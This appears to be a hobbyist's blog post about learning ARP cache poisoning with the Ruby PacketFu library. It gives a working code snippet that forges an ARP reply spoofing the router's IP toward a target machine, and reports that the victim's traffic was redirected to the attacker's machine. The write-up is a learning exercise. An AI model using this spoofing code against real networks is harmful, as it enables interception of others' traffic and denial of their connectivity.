My very good online friend Adam has been reading my recent PacketFu blog posts and today sent me the challenge of ARP cache poisoning. And what an excellent challenge it has been. I knew vaguely of ARP Cache Poisoning but nothing concrete and so had to learn about the protocol, the principle of ARP Packet spoofing and cache poisoning, and then figure out how to so the same in PacketFu. Boy I’ve learnt a lot today.
Here’s how I did it:
x = PacketFu::ARPPacket.new(:flavor => “Windows”) <– New ARP Packet Object
x.eth_saddr=”04:7d:7b:c5:98:cf” <– Attacking MAC Address
x.eth_daddr=”00:0c:76:17:a4:17″ <– Target Mac Address
x.arp_saddr_mac=”04:7d:7b:c5:98:cf” <– Attacking MAC Address
x.arp_daddr_mac=”00:0c:76:17:a4:17″ <– Target Mac Address
x.arp_saddr_ip=’192.168.1.254′ <– “Spoofed” router IP Address
x.arp_daddr_ip=”192.168.1.79″ <– Target IP Address
x.arp_opcode=2 <– ARP “Reply”
x.to_w(‘eth0′) <– Put packet to wire
It all looks so simple laid out like this.
Once I rebooted the target machine and input arp -a in the command prompt the MAC address for the router IP had indeed changed to the attacking machine’s. The target machine’s traffic started flowing through Wireshark to the attacking machine.
I could no longer access the Internet on the target machine and so the next stage would be forwarding the target machine traffic to the router.
But that’s for another day.
Thanks again to Adam who bears the brunt every time I’m stuck with something and does so with extraordinary patience Image may be NSFW.
Clik here to view.
UPDATE: Have blogged this including infinite looping with 30 second intervals.
